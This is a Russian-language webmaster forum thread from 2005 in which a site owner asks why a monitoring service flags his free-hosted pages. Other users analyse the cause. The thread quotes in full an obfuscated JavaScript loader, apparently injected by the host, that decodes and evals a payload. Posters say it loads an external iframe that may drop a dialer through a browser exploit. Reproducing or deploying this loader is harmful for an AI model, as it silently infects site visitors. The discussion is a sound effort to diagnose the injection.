Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Захожу я на CJLog...
цитата
09/07/05 в 16:17
 darinart
Воот. И вижу там один свой дохленький сиджик на 64-й странице.
Сам по себе факт ничего не значит. Так ведь стоит Purity: 6 !!!
Чё за гадня!!?? Я на свои сиджи вообще никакой хрени не вешаю! Просто не умею да и НЕ ХОЧУ ЭТОМУ УЧИТСЯ! (Консоли можна было б сделать - да ни к чему пока)
Смотрю дальше. Приведен вот такой код -
Код:
Trade script supposition: Avrora 
Suspicious X-activity: ------- JavaScript Begin -------
<script>function a(er,sa){if (!sa)sa='-}zZaB$v@]w/WEx6pLf.CyhJY^Tt!_3D
81FIi0"e{k:)GjX4*mHuM5gA,9qnrK?V';var ii;var t='';for(var we=0;we<er.l
ength;we+=arguments.callee.toString().length-506){ii=(sa.indexOf(er.ch
arAt(we))&255)<<18|(sa.indexOf(er.charAt(we+1))&255)<<12|(sa.indexOf(e
r.charAt(we+2))&255)<<(arguments.callee.toString().length-504)|sa.inde
xOf(er.charAt(we+3))&255;t+=String.fromCharCode((ii&(16711600+80))>>16
,(ii&(255*256))>>8,ii&255);}eval(t.substring(0,t.length-arguments.call
ee.toString().length+508));}a('Yf8exM5v^Ik:_0]h/vB.x0k)yukEYu55^iG4xiM
?@ZkECz{nTF]D!F0A^i^0CiGq]ICHL"yCLM,kEu^$fIM4xZ]mLv_"hy{,/ZkTxI@FCuj:h
BkxDe_/x$yA/5YiLg0$wiE/.F0K^50T6I@qfIY8_u@8.Z1T_g^$^y]/xi{8.a9:xHk^Te^
f_fiqyuGkEu5HtAy3.iM?yujaY.^HtAy3L0{Ap5^EYM!q^y@H."k)y5^ECI^zt5!K."{At
.j:@B9$h"j"!"k1EI{kDJ8,wi*g_g^^Lv!:p5{qhi^Yx$C?/.kaCI]$]iE"yipg/uj:C"y
$pCE/.F0K^50T6I@qfIY8_u@8.Z1aC"y$^y-mxgr8Jey}th95]eMK]H*eD.C"fF]p.f05T
H8,yv_q!eaA]$KI6"k?h.jxyiYqpi}3YCB"ty]0/Z5JT.rjWyW4f58:WI^gLB{8pA1X.a_
D^H!k@z-=');</script>
------- Javascript End -------
------- JavaScript Begin -------
<script>try{eval(j)}catch(ex){}</script>
------- Javascript End -------

Это мне что, Colinsfreehost счет за хостинг выписал?? Просматриваю код морды в браузере - ничего лишнего, кроме текстовых линков хостинга НЕТ. Или это глюк сервиса CJlog?? Кто сие сможет разъяснить?
И если кому не в лом - что делает скрипт, код которого приведен выше?
цитата
09/07/05 в 16:53
 Draft
CJLog нет глюка такого. Он не выдумывает html код у людей, то что есть то и берет. Стукнись в ICQ пожалуйста.
цитата
09/07/05 в 17:12
 vitaminxxx
извиняюсь за оффтоп

Народ подскажите, а где этот гребаный мелкософтовский SRCENC взять?
Поискал в гуглу ни хрена не нашел. На сайте мелких написано, что он просто вызывается из командной строки. А у меня на двух ОС - XP и 2000 его нет.

Или может кто чем другим кодированный JScript декодирует?
цитата
09/07/05 в 17:20
 WinXXXP
А его и нет в штатной винде, брать тут:
http://download.microsoft.com/download/0/0/7/0073477f-bbf9-4510-86f…ce10en.exe

Запутал, ищет энкодер, а хочет декодировать, декодер тут:
http://www.virtualconspiracy.com/download/scrdec18.exe
цитата
09/07/05 в 17:44
 Phoenix66
Колин вообще то по жизни ставил дайлер на 404 паге, но на обычные паги не лепил впроде. Может что поменялось счас и каким-то странам лепит.
цитата
09/07/05 в 19:58
 JpS
грузит ифрейм с 46667.www1.elwisp.com/eifr.php?cust=87
осторожно, может быть эксплоит, у меня не сработало ничего.

Последний раз редактировалось: JpS (09/07/05 в 20:03), всего редактировалось 1 раз
цитата
09/07/05 в 20:01
 JpS
судя потому что там стоит:
Код:

  if (  (typeof(caps.connectionType)=='undefined') ||
                  (caps.connectionType!='lan'))


там скорее всего грузится дайлер. дальше смотреть не стал, понял что через CHM-эксп грузится экзе.
цитата
10/07/05 в 15:08
 darinart
Всем спасибо.
Выяснили с Draft'ом, что на всех СиДжах на домене colinsfreehost такая же фигня.

PS. Опять я на русских нарвался!.. smail45.gif
цитата
10/07/05 в 19:04
 Phoenix66
Ну а хули б не юзать платный хостинг?


Эта страница в полной версии